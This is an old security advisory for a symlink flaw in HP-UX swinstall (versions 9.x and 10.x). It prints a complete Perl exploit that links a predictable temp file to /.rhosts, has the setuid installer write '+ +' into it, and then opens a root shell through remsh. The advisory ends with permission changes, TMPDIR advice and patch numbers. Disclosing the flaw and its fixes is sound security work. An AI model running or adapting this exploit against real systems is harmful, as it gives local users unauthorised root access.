COMMAND

    /usr/sbin/swinstall

SYSTEMS AFFECTED

    HP-UX 9.X and 10.X

PROBLEM

    The  programs  supplied  with  this  package  create  files  in an
    insecure manner.  As these programs execute with root  privileges,
    it is  possible to  create or  over-write arbitrary  files on  the
    system.   Local  users  may  be  able  to  create  or   over-write
    arbitrary files  on the  system.   This can  be leveraged  to gain
    root privileges.   It also happens  to make   any file you   like,
    adn it   will do so   mode 666.   Here is the  exploit for .rhosts
    file (+ +).  Credit goes to SOD.

------------------------------------------------------------------------------
#!/usr/bin/perl

# 9.x=/usr/tmp 10.X=/var/tmp... -- not many 9.X's will have swinstall,
# it's not standard, for 9, really.. 10, yes, 9 Mmmm.. There's a version
# of it _for_ 9.x, but it does seem rare..

$swinstall="/usr/sbin/swinstall";
stat($swinstall) || do {
  print STDERR "I can only work on systems that have swinstall loaded..\n";
  print STDERR "Yours doesn't seem to...\n";
  exit;
  };

if ($#ARGV<0) {
  $newfile="/.rhosts";
  } else {
  $newfile="$ARGV[0]";
  }

if (-f "$newfile") {
  print STDERR "$newfile exists!\n";
  print STDERR "I can only make files that don't already exist..\n";
  exit;
  }

open(UNAME,"uname -r|");
chop($uname=<UNAME>);
$uname=~s/^..(..)...$/$1/;
umask(0000);
$num=sprintf("%05d",$$+3); # two for exec, three for system.
$tmpfile="/usr/tmp/AAAa$num";
$tmpfile="/var/tmp/AAAa$num" if $uname eq "10";
symlink($newfile,$tmpfile);

print "Please wait one moment while I do stuff...\n";
system("/usr/sbin/swinstall -s '\
+ +
' -p bob localhost:/");
#unlink($tmpfile);
if ($newfile eq "/.rhosts") {
  system("remsh localhost -l root ksh -i");
  } else {
  system(">$newfile;ls -l $newfile");
  }
------------------------------------------------------------------------------

SOLUTION


    When  not  being  used,  the  program  should be either removed or
    disabled to prevent it from being used for malicious purposes.  To
    disable the program, change  the permissions to owner  only access
    and clear the suid bit.   Insure that swinstall is owned by  root.
    Only root will then be able to do program installations.

        # chmod 400 /usr/sbin/swinstall
        # chmod 400 /usr/sbin/swmodify

    If packages must be installed, the machine should be brought  into
    single-user    mode,    execute    permissions    re-enabled    on
    /usr/sbin/swinstall,

        # chmod 700 /usr/sbin/swinstall
        # chmod 700 /usr/sbin/swmodify

    The  SD-UX  programs  use  a  number  of  temporary  files.    The
    location of these  files can be  configured using the  environment
    variable TMPDIR.  It is  possible to set the environment  variable
    TMPDIR to a  non-world writable directory.   Having the  temporary
    files  created  in  a  non-world  writable  directory prevents the
    exploitation of the vulnerability.

    If you use this, apply the following patches as needed:

        PHCO_10652 for HP-UX release 10.00 and 10.01,
        PHCO_10028 for HP-UX release 10.10,
        PHCO_11004 for HP-UX release 10.20,
        PHCO_11185 for HP-UX release 10.16,
        PHCO_11183 for HP-UX release 10.24.
        For SD OV (released on 9.X) PHCO_11162 9.0[04]
                                    PHCO_11161 9.0[1357]